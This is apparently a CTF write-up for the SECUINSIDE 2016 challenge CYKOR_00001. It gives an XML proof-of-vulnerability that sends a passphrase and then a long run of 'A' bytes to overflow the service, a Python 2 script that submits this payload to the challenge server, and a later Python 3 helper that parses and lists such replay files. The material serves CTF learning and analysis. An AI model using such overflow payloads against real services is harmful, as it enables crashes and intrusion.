  • SECUINSIDE 2016 CYKOR_00001
    CTF 2016. 7. 10. 22:04

    Please read my previous post first; the binary is the same.


    The exploit works by sending the PoV to the service as XML.


    <?xml version="1.0" standalone="no" ?>

    <!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">

    <pov>

        <cbid>service</cbid>

        <replay>

        <read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>

        <write><data>H4PPY_S3CUINSID3\x0a</data></write>

        <read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>

        <write><data>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0a</data></write>

        <read><delim>\x0a</delim><match><data>- Why so serious?\x0a</data></match></read>

        </replay>

    </pov>




    # Python 2 script: submits the XML PoV above to the challenge service.
    from socket import *
    from telnetlib import *

    HOST = "cgc.cykor.kr"
    PORT = 31324

    def recvuntil(t):
        # Read one byte at a time until the data ends with t (or the peer closes).
        data = ''
        while not data.endswith(t):
            tmp = s.recv(1)
            if not tmp: break
            data += tmp
        return data

    s = socket(AF_INET, SOCK_STREAM)
    s.connect((HOST, PORT))

    payload = open("cykor1.xml", "rb").read()
    print recvuntil("What type of your PoV? (BIN / XML)")
    s.send("XML\n")
    print recvuntil("How many bytes is your XML?")
    s.send("671\n")  # declared XML size, hard-coded for this cykor1.xml
    print recvuntil("Ok.... send it :)")
    print len(payload)
    s.send(payload + "\n")

    # Hand the socket to telnetlib for an interactive session.
    t = Telnet()
    t.sock = s
    t.interact()
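For reviewing what a replay-format PoV like the XML above actually sends, the following added example (Python 3, not part of the original post) decodes the `\xNN` escapes and lists each step with its byte count. The sample PoV is constructed with a shortened 40-byte filler, and the helper names are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the same shape as the PoV above; the filler run
# is shortened to 40 bytes here (an assumption for brevity).
SAMPLE_POV = r"""<?xml version="1.0" standalone="no" ?>
<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
    <cbid>service</cbid>
    <replay>
    <read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>
    <write><data>H4PPY_S3CUINSID3\x0a</data></write>
    <read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>
    <write><data>FILLER\x0a</data></write>
    <read><delim>\x0a</delim><match><data>- Why so serious?\x0a</data></match></read>
    </replay>
</pov>
""".replace("FILLER", "A" * 40)

def decode(text):
    """Turn literal \\xNN escapes into the bytes they stand for."""
    return re.sub(rb"\\x([0-9a-fA-F]{2})",
                  lambda m: bytes([int(m.group(1), 16)]),
                  (text or "").encode("latin-1"))

def replay_steps(pov_xml):
    """Return [(direction, payload_bytes)] in replay order."""
    kinds = {"write": "send", "read": "expect"}
    steps = []
    for step in ET.fromstring(pov_xml).find("replay"):
        if step.tag in kinds:
            payload = b"".join(decode(d.text) for d in step.iter("data"))
            steps.append((kinds[step.tag], payload))
    return steps

def longest_run(data):
    """Length of the longest run of one repeated byte (padding heuristic)."""
    best, run, prev = 0, 0, None
    for b in data:
        run = run + 1 if b == prev else 1
        prev, best = b, max(best, run)
    return best

def largest_send(pov_xml):
    """Return the longest payload the replay writes to the service."""
    return max((p for k, p in replay_steps(pov_xml) if k == "send"), key=len)

if __name__ == "__main__":
    for kind, payload in replay_steps(SAMPLE_POV):
        print(f"{kind:6} {len(payload):4} bytes  run={longest_run(payload):3}  {payload[:24]!r}")
```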



